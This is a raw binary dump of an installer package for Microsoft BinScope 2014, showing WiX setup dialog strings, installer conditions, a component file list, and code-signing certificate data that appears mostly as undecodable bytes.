1;\\lsdpriority50 \\lsdlocked0 Grid Table 5 Dark Accent 1;\\lsdpriority51 \\lsdlocked0 Grid Table 6 Colorful Accent 1; \\lsdpriority52 \\lsdlocked0 Grid Table 7 Colorful Accent 1;\\lsdpriority46 \\lsdlocked0 Grid Table 1 Light Accent 2;\\lsdpriority47 \\lsdlocked0 Grid Table 2 Accent 2;\\lsdpriority48 \\lsdlocked0 Grid Table 3 Accent 2; \\lsdpriority49 \\lsdlocked0 Grid Table 4 Accent 2;\\lsdpriority50 \\lsdlocked0 Grid Table 5 Dark Accent 2;\\lsdpriority51 \\lsdlocked0 Grid Table 6 Colorful Accent 2;\\lsdpriority52 \\lsdlocked0 Grid Table 7 Colorful Accent 2; \\lsdpriority46 \\lsdlocked0 Grid Table 1 Light Accent 3;\\lsdpriority47 \\lsdlocked0 Grid Table 2 Accent 3;\\lsdpriority48 \\lsdlocked0 Grid Table 3 Accent 3;\\lsdpriority49 \\lsdlocked0 Grid Table 4 Accent 3; \\lsdpriority50 \\lsdlocked0 Grid Table 5 Dark Accent 3;\\lsdpriority51 \\lsdlocked0 Grid Table 6 Colorful Accent 3;\\lsdpriority52 \\lsdlocked0 Grid Table 7 Colorful Accent 3;\\lsdpriority46 \\lsdlocked0 Grid Table 1 Light Accent 4; \\lsdpriority47 \\lsdlocked0 Grid Table 2 Accent 4;\\lsdpriority48 \\lsdlocked0 Grid Table 3 Accent 4;\\lsdpriority49 \\lsdlocked0 Grid Table 4 Accent 4;\\lsdpriority50 \\lsdlocked0 Grid Table 5 Dark Accent 4; \\lsdpriority51 \\lsdlocked0 Grid Table 6 Colorful Accent 4;\\lsdpriority52 \\lsdlocked0 Grid Table 7 Colorful Accent 4;\\lsdpriority46 \\lsdlocked0 Grid Table 1 Light Accent 5;\\lsdpriority47 \\lsdlocked0 Grid Table 2 Accent 5; \\lsdpriority48 \\lsdlocked0 Grid Table 3 Accent 5;\\lsdpriority49 \\lsdlocked0 Grid Table 4 Accent 5;\\lsdpriority50 \\lsdlocked0 Grid Table 5 Dark Accent 5;\\lsdpriority51 \\lsdlocked0 Grid Table 6 Colorful Accent 5; \\lsdpriority52 \\lsdlocked0 Grid Table 7 Colorful Accent 5;\\lsdpriority46 \\lsdlocked0 Grid Table 1 Light Accent 6;\\lsdpriority47 \\lsdlocked0 Grid Table 2 Accent 6;\\lsdpriority48 \\lsdlocked0 Grid Table 3 Accent 6; \\lsdpriority49 \\lsdlocked0 Grid Table 4 Accent 6;\\lsdpriority50 \\lsdlocked0 Grid Table 5 Dark Accent 6;\\lsdpriority51 \\lsdlocked0 Grid Table 6 Colorful Accent 6;\\lsdpriority52 \\lsdlocked0 Grid Table 7 Colorful Accent 6; \\lsdpriority46 \\lsdlocked0 List Table 1 Light;\\lsdpriority47 \\lsdlocked0 List Table 2;\\lsdpriority48 \\lsdlocked0 List Table 3;\\lsdpriority49 \\lsdlocked0 List Table 4;\\lsdpriority50 \\lsdlocked0 List Table 5 Dark; \\lsdpriority51 \\lsdlocked0 List Table 6 Colorful;\\lsdpriority52 \\lsdlocked0 List Table 7 Colorful;\\lsdpriority46 \\lsdlocked0 List Table 1 Light Accent 1;\\lsdpriority47 \\lsdlocked0 List Table 2 Accent 1;\\lsdpriority48 \\lsdlocked0 List Table 3 Accent 1; \\lsdpriority49 \\lsdlocked0 List Table 4 Accent 1;\\lsdpriority50 \\lsdlocked0 List Table 5 Dark Accent 1;\\lsdpriority51 \\lsdlocked0 List Table 6 Colorful Accent 1;\\lsdpriority52 \\lsdlocked0 List Table 7 Colorful Accent 1; \\lsdpriority46 \\lsdlocked0 List Table 1 Light Accent 2;\\lsdpriority47 \\lsdlocked0 List Table 2 Accent 2;\\lsdpriority48 \\lsdlocked0 List Table 3 Accent 2;\\lsdpriority49 \\lsdlocked0 List Table 4 Accent 2; \\lsdpriority50 \\lsdlocked0 List Table 5 Dark Accent 2;\\lsdpriority51 \\lsdlocked0 List Table 6 Colorful Accent 2;\\lsdpriority52 \\lsdlocked0 List Table 7 Colorful Accent 2;\\lsdpriority46 \\lsdlocked0 List Table 1 Light Accent 3; \\lsdpriority47 \\lsdlocked0 List Table 2 Accent 3;\\lsdpriority48 \\lsdlocked0 List Table 3 Accent 3;\\lsdpriority49 \\lsdlocked0 List Table 4 Accent 3;\\lsdpriority50 \\lsdlocked0 List Table 5 Dark Accent 3; \\lsdpriority51 \\lsdlocked0 List Table 6 Colorful Accent 3;\\lsdpriority52 \\lsdlocked0 List Table 7 Colorful Accent 3;\\lsdpriority46 \\lsdlocked0 List Table 1 Light Accent 4;\\lsdpriority47 \\lsdlocked0 List Table 2 Accent 4; \\lsdpriority48 \\lsdlocked0 List Table 3 Accent 4;\\lsdpriority49 \\lsdlocked0 List Table 4 Accent 4;\\lsdpriority50 \\lsdlocked0 List Table 5 Dark Accent 4;\\lsdpriority51 \\lsdlocked0 List Table 6 Colorful Accent 4; \\lsdpriority52 \\lsdlocked0 List Table 7 Colorful Accent 4;\\lsdpriority46 \\lsdlocked0 List Table 1 Light Accent 5;\\lsdpriority47 \\lsdlocked0 List Table 2 Accent 5;\\lsdpriority48 \\lsdlocked0 List Table 3 Accent 5; \\lsdpriority49 \\lsdlocked0 List Table 4 Accent 5;\\lsdpriority50 \\lsdlocked0 List Table 5 Dark Accent 5;\\lsdpriority51 \\lsdlocked0 List Table 6 Colorful Accent 5;\\lsdpriority52 \\lsdlocked0 List Table 7 Colorful Accent 5; \\lsdpriority46 \\lsdlocked0 List Table 1 Light Accent 6;\\lsdpriority47 \\lsdlocked0 List Table 2 Accent 6;\\lsdpriority48 \\lsdlocked0 List Table 3 Accent 6;\\lsdpriority49 \\lsdlocked0 List Table 4 Accent 6; \\lsdpriority50 \\lsdlocked0 List Table 5 Dark Accent 6;\\lsdpriority51 \\lsdlocked0 List Table 6 Colorful Accent 6;\\lsdpriority52 \\lsdlocked0 List Table 7 Colorful Accent 6;}}{\\\*\\datastore 010500000200000018000000 4d73786d6c322e534158584d4c5265616465722e362e3000000000000000000000060000 d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001000000010000000000000000100000feffffff00000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff fffffffffffffffffdfffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffffffffffff0c6ad98892f1d411a65f0040963251e5000000000000000000000000605b eae976c8cf01feffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000105000000000000}}VerifyReadyDlgChange&ChangeChangeNoShieldRepairRe&pair&RemoveRemoveNoShieldUpdate&UpdateUpdateNoShieldInstallTitle{\\WixUI\_Font\_Title}Ready to install \[ProductName\]InstallTextClick Install to begin the installation. Click Back to review or change any of your installation settings. Click Cancel to exit the wizard.ChangeTitle{\\WixUI\_Font\_Title}Ready to change \[ProductName\]ChangeTextClick Change to begin the installation. Click Back to review or change any of your installation settings. Click Cancel to exit the wizard.RepairTitle{\\WixUI\_Font\_Title}Ready to repair \[ProductName\]RepairTextClick Repair to repair the installation of \[ProductName\]. Click Back to review or change any of your installation settings. Click Cancel to exit the wizard.RemoveTitle{\\WixUI\_Font\_Title}Ready to remove \[ProductName\]RemoveTextClick Remove to remove \[ProductName\] from your computer. Click Back to review or change any of your installation settings. Click Cancel to exit the wizard.UpdateTitle{\\WixUI\_Font\_Title}Ready to update \[ProductName\]UpdateTextClick Update to update \[ProductName\] from your computer. Click Back to review or change any of your installation settings. Click Cancel to exit the wizard.MyInstallDirDlgClick Next to install to the default folder or click Change to choose another.{\\WixUI\_Font\_Title}Destination FolderFolderFolderLabelInstall \[ProductName\] to:WIXUI\_INSTALLDIRChangeFolder&Change...MaintenanceTypeDlgChangeButtonRepairButtonChange Installation|Lets you change the way features are installed.ChangeDisabledText\[ProductName\] has no independently selectable features.RemoveButtonRepair Installation|Repairs errors in the most recent installation by fixing missing and corrupt files, shortcuts, and registry entries.RepairDisabledText\[ProductName\] cannot be repaired.Remove Installation|Removes \[ProductName\] from your computer.RemoveDisabledText\[ProductName\] cannot be removed.{\\WixUI\_Font\_Title}Change, repair, or remove installationSelect the operation you wish to perform.MaintenanceWelcomeDlgThe Setup Wizard allows you to change the way \[ProductName\] features are installed on your computer or to remove it from your computer. Click Next to continue or Cancel to exit the Setup Wizard.ShowNOT Installed OR (Installed AND (RESUME OR Preselected) AND NOT PATCH)WixUI\_InstallMode = "Change"WixUI\_InstallMode = "Repair"WixUI\_InstallMode = "Remove"WixUI\_InstallMode = "Update"ALLUSERSNOT ALLUSERSWIXUI\_EXITDIALOGOPTIONALTEXT AND NOT InstalledWIXUI\_EXITDIALOGOPTIONALCHECKBOXTEXT AND NOT InstalledNOT Installed OR NOT PATCHHideInstalled AND PATCHDisableLicenseAccepted <> "1"EnableLicenseAccepted = "1"NOT Installed AND ALLUSERSNOT InstalledDefaultNOT Installed AND NOT ALLUSERSWixUI\_InstallMode = "Change" AND ALLUSERS AND (ADDLOCAL OR REMOVE)WixUI\_InstallMode = "Change" AND (NOT ALLUSERS OR (NOT ADDLOCAL AND NOT REMOVE))WixUI\_InstallMode = "Remove" AND ALLUSERSWixUI\_InstallMode = "Remove" AND NOT ALLUSERSWixUI\_InstallMode = "Update" AND ALLUSERSWixUI\_InstallMode = "Update" AND NOT ALLUSERSARPNOMODIFYARPNOREPAIRARPNOREMOVEDoActionWixUIValidatePathSpawnDialogWIXUI\_INSTALLDIR\_VALID<>"1"EndDialogNewDialogSetTargetPath\[WIXUI\_INSTALLDIR\]NOT WIXUI\_DONTVALIDATEPATHNOT WIXUI\_DONTVALIDATEPATH AND WIXUI\_INSTALLDIR\_VALID<>"1"WIXUI\_DONTVALIDATEPATH OR WIXUI\_INSTALLDIR\_VALID="1"\[\_BrowseProperty\]Installed AND NOT PATCHReset0DirectoryListUpDirectoryListNewErrorYesErrorAbortErrorCancelErrorIgnoreErrorNoErrorOkErrorRetryRMShutdownAndRestartWixUIRMOption~="UseRM"SpawnWaitDialog1 OR CostingComplete = 1OutOfDiskSpace <> 1OutOfDiskSpace = 1 AND OutOfNoRbDiskSpace = 0 AND (PROMPTROLLBACKCOST="P" OR NOT PROMPTROLLBACKCOST)OutOfDiskSpace = 1 AND OutOfNoRbDiskSpace = 0 AND PROMPTROLLBACKCOST="D"EnableRollbackFalse(OutOfDiskSpace = 1 AND OutOfNoRbDiskSpace = 1) OR (OutOfDiskSpace = 1 AND PROMPTROLLBACKCOST="F")\[WixUI\_InstallMode\]WixUIPrintEulaReinstallModeecmusReinstallAllAddLocalALLValidatePathPrintEula\[ProductName\] SetupMYPROGRAMFILESProgramFiles64Folder.TARGETDIRProgramMenuFolderay-xduki|BinScope 2014SourceDirowwhoo5q|Microsoft BinScope 2014Pluginsdgxuzhfi|ReportingIgnoreChangeSetProgressProgressProductFeatureBinScope7.0.20804.1v0wgiqfx.dll|Microsoft.SecurityDevelopmentLifecycle.SdlCommon.dllojtu27bl.dll|System.Collections.Immutable.dll4.6.23123.03jkw8p79.dll|DebugInfo.dllvxf6zt-p.dll|ManagedMD.dllnrzf4jc9.dll|ConfigurationParser.dll12.0.21005.11033pidwmcd2.man|msdia120.dll.manifest6.3.9600.16384\_eytozuh.dll|BinScopeLib.dllsmwuu39b.dll|CommonChecks.dllh\_yaldyj.txt|BadHashes.txtajzcohne.xml|AllowedLibs.xmlaykwj1hn.dll|WackChecks.dllj9lfxjit.xsl|CSV Report.xslty4dtzha5.xsl|HTML Report.xsltBinScopeIcon.exeFindRelatedProductsLaunchConditionsValidateProductIDProcessComponentsUnpublishFeaturesRemoveRegistryValuesRemoveFilesWriteRegistryValuesRegisterUserRegisterProductRemoveExistingProductsNOT Installed OR PATCHInstalled AND (RESUME OR Preselected)Installed AND NOT RESUME AND NOT Preselected AND NOT PATCHInstalled OR NETFRAMEWORK45BinScope requires the .NET Framework 4.5 or higher to run.Installed OR NOT NEW\_VERSION\_FOUNDA newer version of Microsoft BinScope is already installed.#media1.cabARPPRODUCTICONManufacturerMicrosoft CorporationProductCode{C7F11A71-09AA-43CC-9DFC-8CB12E678F21}ProductLanguageProductNameMicrosoft BinScope 2014ProductVersion7.0.7000.0{A3E3A87F-9D61-4E09-B99F-D613FBA60F77}DefaultUIFontWixUI\_Font\_NormalWixUI\_ModeInstallDirErrorDialogUseRMSecureCustomPropertiesBINSCOPE\_UPGRADE;NETFRAMEWORK45;NEW\_VERSION\_FOUND;SDL51\_EXTERNAL\_BINSCOPE\_UPGRADE;SDL7\_BINSCOPE\_BEFORE\_APRIL\_UPGRADEWixPdbPathC:\\Dev\\Archive\\Main\\bin\\x64\\Release\\Installers\\BinScopeExternal\\BinScope\_x64.wixpdb&Close the applications and attempt to restart them.DontUseRM&Do not close applications. A reboot will be required.Software\\Microsoft\\BinScope 2014installed#1SOFTWARE\\Microsoft\\BinScope\\Microsoft BinScope 2014InstallLocation\[INSTALLLOCATION\]SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\FullReleaseTahomaWixUI\_Font\_BiggerWixUI\_Font\_TitleAbsentPathbytesGBKBMBMenuAbsentEntire feature will be unavailableMenuAdvertiseFeature will be installed when requiredMenuAllCDEntire feature will be installed to run from CDMenuAllLocalEntire feature will be installed on local hard driveMenuAllNetworkEntire feature will be installed to run from networkMenuCDWill be installed to run from CDMenuLocalWill be installed on local hard driveMenuNetworkWill be installed to run from networkFolder|New FolderScriptInProgressGathering required information...SelAbsentAbsentThis feature will remain uninstalledSelAbsentAdvertiseThis feature will be set to be installed when requiredSelAbsentCDThis feature will be installed to run from CDSelAbsentLocalThis feature will be installed on the local hard driveSelAbsentNetworkThis feature will be installed to run from the networkSelAdvertiseAbsentThis feature will become unavailableSelAdvertiseAdvertiseWill be installed when requiredSelAdvertiseCDThis feature will be available to run from CDSelAdvertiseLocalThis feature will be installed on your local hard driveSelAdvertiseNetworkThis feature will be available to run from the networkSelCDAbsentThis feature will be uninstalled completely, you won't be able to run it from CDSelCDAdvertiseThis feature will change from run from CD state to set to be installed when requiredSelCDCDThis feature will remain to be run from CDSelCDLocalThis feature will change from run from CD state to be installed on the local hard driveSelChildCostNegThis feature frees up \[1\] on your hard drive.SelChildCostPosThis feature requires \[1\] on your hard drive.SelCostPendingCompiling cost for this feature...SelLocalAbsentThis feature will be completely removedSelLocalAdvertiseThis feature will be removed from your local hard drive, but will be set to be installed when requiredSelLocalCDThis feature will be removed from your local hard drive, but will be still available to run from CDSelLocalLocalThis feature will remain on your local hard driveSelLocalNetworkThis feature will be removed from your local hard drive, but will be still available to run from the networkSelNetworkAbsentThis feature will be uninstalled completely, you won't be able to run it from the networkSelNetworkAdvertiseThis feature will change from run from network state to set to be installed when requiredSelNetworkLocalThis feature will change from run from network state to be installed on the local hard driveSelNetworkNetworkThis feature will remain to be run from the networkSelParentCostNegNegThis feature frees up \[1\] on your hard drive. It has \[2\] of \[3\] subfeatures selected. The subfeatures free up \[4\] on your hard drive.SelParentCostNegPosThis feature frees up \[1\] on your hard drive. It has \[2\] of \[3\] subfeatures selected. The subfeatures require \[4\] on your hard drive.SelParentCostPosNegThis feature requires \[1\] on your hard drive. It has \[2\] of \[3\] subfeatures selected. The subfeatures free up \[4\] on your hard drive.SelParentCostPosPosThis feature requires \[1\] on your hard drive. It has \[2\] of \[3\] subfeatures selected. The subfeatures require \[4\] on your hard drive.TimeRemainingTime remaining: {\[1\] minutes }{\[2\] seconds}VolumeCostAvailableAvailableVolumeCostDifferenceDifferenceVolumeCostRequiredRequiredVolumeCostSizeDisk SizeVolumeCostVolumeVolume{29CFD7C7-D514-41A0-A359-5DBAD01E5098}1.0.1SDL51\_EXTERNAL\_BINSCOPE\_UPGRADE7.0.07.255.65535SDL7\_BINSCOPE\_BEFORE\_APRIL\_UPGRADEBINSCOPE\_UPGRADE7.0.65535NEW\_VERSION\_FOUND0�\*) \*�H�� ��\*0�\*10 \`�He0w +�7�i0g02 +�70$��F010 \`�He )�y���Bdd��ܼ\]�@�%ߙ��F��� �0�0���38�#m'�&�80 \*�H�� 0~10 UUS10U Washington10URedmond10U Microsoft Corporation1(0&UMicrosoft Code Signing PCA 20110 141001181116Z 160101181116Z0��10 UUS10U Washington10URedmond10U Microsoft Corporation1 0UMOPR10UMicrosoft Corporation0�"0 \*�H�� �0� ������e��c��r��$�\_��DY�o��p�ei���1^��+d��l�!�Ð̂��ce����� ������L���'��;-�}��K>Cu�FČ�ۉ�$���G'�m��x��e�o7�q��������~�7%ف$���cF� �/؎����6�dhM�B/� ��(JG���ٲz���8��E�:�\*�9�?����9,6���hw�xo>� �����a�����>��� Y卋��0�{0U%0+ +�7L0U���$�E���u%�/0�bs0QUJ0H�F0D1 0UMOPR1301U\*31642+c22c9936-b3c7-4271-a4bd-fe03fa72c3f00U#0�Hnd�Pӂ�77"�m��u�0TUM0K0I�G�E�Chttp://www.microsoft.com/pkiops/crl/MicCodSigPCA2011\_2011-07-08.crl0a+U0S0Q+0�Ehttp://www.microsoft.com/pkiops/certs/MicCodSigPCA2011\_2011-07-08.crt0U�00 \*�H�� ��rn���5���:�7�4�{��S���13{O"��uVGMtk��\\.t�p�Fo���YM4���u�\]3���5~�H�剥-:7'G�h�hZF���������\`U�DkMϽޥܻ�z���H�F{u�s�����\*-x��k��^I�:�4�b�����c��a����|����e\`3Y8��2\\~�{��~��\]�D�fL�@&�L�N�?��l�خ�&f�e���c��m)\*'�N'ʶ�L��m ��.Ä}r���>\`�̻��O��^w�㊫o >+�g�G���\]z<��\`��F�V\\�+�.����(��Օ?���k���ͼ��@�q�F��n��\]��'��F{��:�����7F冫��uzv�K;��\\��9!���w���$��8L����m��J�(c�Pc\\��U��A�7@pc����hG\_�r� S?��B�9K�A�/0�\[&��-Ny��z\]�7j�H�v�/�l6XՒ����^2��)���8�5�k80�z0�b� a��0 \*�H�� 0��10 UUS10U Washington10URedmond10U Microsoft Corporation1200U)Microsoft Root Certificate Authority 20110 110708205909Z 260708210909Z0~10 UUS10U Washington10URedmond10U Microsoft Corporation1(0&UMicrosoft Code Signing PCA 20110�"0 \*�H�� �0� ����r.��n��M4��X!�B\*k�ZP��8I���7k���8��9�1BӉ yd�~�\`$l��I��h^�ߛS� ,ï٩+�z �זY�\`�fv�2R&/�PϳD�\]��.u�h��m�:\\��F��8d�nd5x��c-�@���� �\\y�I)� ��w��=���+ZMV(�zr�:�I^���C���{�{��>��\]�O��/Y�;-�3Xŷ>�2ӳ=����8~ҝ�,�NV�!5%�9ndS���#�������\_��R������!t%\_(��'(8%�9J6�|���#��f�aj�(I�\_��%\]�!K>RĵW?$��z\[/�#�p\]QFw��Ἤ�\_�����UK�9��#I��D|E���rz�r�$߿F����Wۃ��MI0�����\[���ݰf����{���K�I)�(��}g��bx\_�/��W�\\�w((��m�(�,�@7O��D�� L�ԥC/t��n�x X,\]\`��>O3�ڰ�ޞN����F�l���ֈ����0��0 +�70UHnd�Pӂ�77"�m��u�0 +�7 SubCA0U�0U�0�0U#0�r-:1�C�N���1�#�40ZUS0Q0O�M�K�Ihttp://crl.microsoft.com/pki/crl/products/MicRooCerAut2011\_2011\_03\_22.crl0^+R0P0N+0�Bhttp://www.microsoft.com/pki/certs/MicRooCerAut2011\_2011\_03\_22.crt0��U ��0��0�� +�7.0��0?+3http://www.microsoft.com/pkiops/docs/primarycps.htm0@+042 Legal\_policy\_statement. 0 \*�H�� �g�Ty.��tg"���c��B�}�y��e\_.,>��r�m���?� �;�G���i�c�"5��\]e��}�FPU��|�K�.)��=�Եw�9��d�D=xz#�}��t����&F\*�����h�h.��\*?\*kXIc inZ�������F+��;н5�n%��'������(��M=����2���-�\[��I9 � �ƭ�����QEX82q'��'��,: i��Y�hno��t�@�\*(>�?Mf��M��o}E�v�@\*e��\]Rb��c6���������'�ͥ���\]cA�\[��>w��u�aa������A�(��e/���\\��֡F�Y� KH���)ű��?Ew5�Ң��zz"�H���G#�����k�K���ux��7�yK�ֳ#hu�������i;��0�L���umc�=ѝVNO��W"�x2!z�A �?��̤\]����WqVNHE�Bɛv\[ �Hk�y���mmj�Rs zP�1��0��0��0~10 UUS10U Washington10URedmond10U Microsoft Corporation1(0&UMicrosoft Code Signing PCA 201138�#m'�&�80 \`�He���0 \*�H�� 1 +�70 +�710 +�70/ \*�H�� 1" V1�qr�� �@:a����l��gd���sI0~ +�71p0n�B�@BinScope 2014 August 2015 Update�(�&http://www.microsoft.com/security/sdl 0 \*�H�� ��\\؎HZ7\_�bUZ��#�4�kL�Po��D͝���h\*�wv1��?8Z�� Q<�����T6��t��V|ǻ�um\]l��b�6uvp��ď�<W!�1��T�>�B�N�7�J��,�o�V=Q&9vŕQ��p�#�yW� a�ǔ��リkEcʠŦ�\[���W�@ҍ�Y���'���6��h�;��.�������i>�D���#���̱1hX'���H���\\�n��|ٵ< ��X�J�J��b����=0�9 +�71�)0�% \*�H�� ��0�10 \`�He0�=\*�H�� ��,�(0�$ +�Y 010 \`�He ת����s�E��vt���r��龏�R�/�U�~%�20150804225350.055Z0��������0��10 UUS10U Washington10URedmond10U Microsoft Corporation1 0UMOPR1'0%UnCipher DSE ESN:B1B7-F67F-FEC21%0#UMicrosoft Time-Stamp Service���0�q0�Y� a �\*0 \*�H�� 0��10 UUS10U Washington10URedmond10U Microsoft Corporation1200U)Microsoft Root Certificate Authority 20100 100701213655Z 250701214655Z0|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100�"0 \*�H�� �0� �� �w�: �����i�ktTե ����|hK,\_���a�v�>f+\[�S'1A�� �|a0Y�0D�\`��TC�M�8�Bݓ��s0W&��E ���G�Ϳ$\`2X\`F�XG�2�tag�\_�T�ϓL��Ħ\]�an(������a�F�'$gr!��Kd�Pb�\]�w=�Wu���BM@Q��>g�f��D~��K�n�ʱ��z\* 1��N���5�x���<�/D����d��� �x�����D\]^�O"M���0��0 +�70U�c:\\�1��C{|F�3hZ�mU0 +�7 SubCA0U�0U�0�0U#0���Vˏ�\\bh�=��\[�Κ�0VUO0M0K�I�G�Ehttp://crl.microsoft.com/pki/crl/products/MicRooCerAut\_2010-06-23.crl0Z+N0L0J+0�>http://www.microsoft.com/pki/certs/MicRooCerAut\_2010-06-23.crt0��U ���0��0�� +�7.0��0=+1http://www.microsoft.com/PKI/docs/CPS/default.htm0@+042 Legal\_Policy\_Statement. 0 \*�H�� ��Q ����?�q=���!o����1�����Wm0���f�j����x�Ǩ�%����kTW+Q�D��S���\`�v�@@A��\\�\\�^5�$VKt�Bȯ���7}Z?�yJ�R�8�/y�e٩�k�����zoK0D$"<�����Y)����p�2J'�U�/���3�b\_��W@��Ιf���jb��J�&�9�Jqc�{!mÜ��<�}�j�x�m����8ؔ�ƥ ������B�����"8 �%�d����~cY%z.9Wv�q����a�˚�G����ͧ��}���;q �\]t�"aڰPo�����1��:�eGx���H���r~akow��˧ �9�����r�������\*T9�\[�� U�z�s;�-��3.)��/T'!�ȬN�(���ۖ��B���AM���\*��f0ӻt2K�c{���/�!�Y���D<�Pqס��U�i�W���0����M� �\]O�8/��X.� �P5�� 'ճ~5��6��\_��t�I0��0�ՠ(�:%��D�D��XkC9�0 \*�H�� 0��10 UUS10U Washington10URedmond10U Microsoft Corporation1200U)Microsoft Root Certificate Authority 20100 100623215724Z 350623220401Z0��10 UUS10U Washington10URedmond10U Microsoft Corporation1200U)Microsoft Root Certificate Authority 20100�"0 \*�H�� �0� ���(���NPh�A�{뮶����"De4iL�p@�{�y��� 9������=v�Zٵ�.<��m$T��V���P��t�Y �ńv�h�o(x�\\��P�D��c\_���,����!�B1�(6��P�b��֫q�\[�� $����շ�˷!b�ܡ\]7��F�����c\*�~j����"����W@���o���E1����E�!@&�r��O<~�X�^c�b�x�� �$j��'�\_�?�J0�������3��"R\\�%�F����YC��b��-�DF�xa~0 ����A\*"f�9E�Nj�� /�R��c3#����g֧P�pc�,��ZC����n)n!!A&����
������2lKL?�\]�嵝wÜ�U�t�8���P�B$���0�Z�R4�s��3�z��A\`�#� �HE�\\Q�.���w����6������p�㍀h�v��\]pR"�f������>/w������HL�7Q#�'Np��Dv�xϚ�f�Q0O0U�0U�0�0U��Vˏ�\\bh�=��\[�Κ�0 +�70 \*�H�� �����������q�C1V��2q\[5����7���&>��O������ �m�\[;depf��Z���Q�gmy�V{䄹+�@�&4�G�i�ѿ�a�gĵ�\`C�6I� ʭ���'e ���\[\*Є3�����X�7�u��r�lu\*f"��0V�@�0�@w���Ӳ���w��S�Myq��0�g��,�"Az�B�YyU�o�ڃf@ h#\[�.&��W�Ÿ�ib2�������|{+3�\*c�hb��G��zE:����iB��GV{�p6�s����M�3#�&�\*�?D܃'��aY+��O�ŋ1�2���B��a�v�Z�=fE�q��$���ԺA4\]-%���HmK�}�� a�tW&��i���Lj�$��R$\\����� ڞ�\_�\[�Ԃ�� P�%@:�����3�nÄ U%9��5\]e1���� �)dz62.ܕ��Zϋ���!���1�L�\`�#"�6d���o�Pa�@�Y�q��3i|�s�8�d�i0��0� 3f~=�%�,6qf0 \*�H�� 0|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100 150604174524Z 160904174524Z0��10 UUS10U Washington10URedmond10U Microsoft Corporation1 0UMOPR1'0%UnCipher DSE ESN:B1B7-F67F-FEC21%0#UMicrosoft Time-Stamp Service0�"0 \*�H�� �0� ��"!������\*��Ul :���;x6�Lʜ� kg��G �� ������:����0�B�YS(@J����وz�23��5��9��ٺ��;: AZ����/5oK��/��g���Y8�X���9P�T$/��Md���Ѷ�Y ��"�\\���D��http://www.microsoft.com/pki/certs/MicTimStaPCA\_2010-07-01.crt0U�00U%0 +0 \*�H�� ��μ�cۉ���Tq�9r������4�#�YW 1�f�q�\\�=\\��w&�a��fo(�U�+�b�RL�y�lQ\]�B�jO�+9ħ�;���>P��<��x0�\`0�㡁����0��10 UUS10U Washington10URedmond10U Microsoft Corporation1 0UMOPR1'0%UnCipher DSE ESN:B1B7-F67F-FEC21%0#UMicrosoft Time-Stamp Service�% 0 +�11�|��|FABw��"j���0�����0��10 UUS10U Washington10URedmond10U Microsoft Corporation1 0UMOPR1'0%UnCipher NTS ESN:4DE9-0C5E-3E091+0)U"Microsoft Time Source Master Clock0 \*�H�� �k�o0"20150804183943Z20150805183943Z0v0< +�Y 1.0,0 �k�o0 /�0\[0 �l��06 +�Y 1(0&0 +�Y � 0�\`� 0� 0 \*�H�� �S��0��ֿ)��f�g�p�C�\\�t�iD%3���p���+�\`�n.�e&�j\`�����9���W6A$�+h��DW��;�H�i���������t����a|�1��$ H7xzc�ٹDh�(�%����M����ޒ!I~:+����}k�c�jy�v/�Lo�ς��C��U�F�dk(L����R"x�>ʒ$Lz��?�P���=ɉ���\*H���R�l��d�|��a���f��n���WI��z\[Z"�1��0��0��0|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103f~=�%�,6qf0 \`�He��20 \*�H�� 1 \*�H�� 0/ \*�H�� 1" �s��r.��X�c,s���,�4�4$����0��\*�H�� 1��0��0��0���11�|��|FABw��"j0��0���~0|10 UUS10U Washington10URedmond10U Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20103f~=�%�,6qf04��9vk'�a �����0 \*�H�� �Rz��v��?�W��K���O���\`r��F3�\[v�0�����U�j��{A��\\�ӯ�q ������u 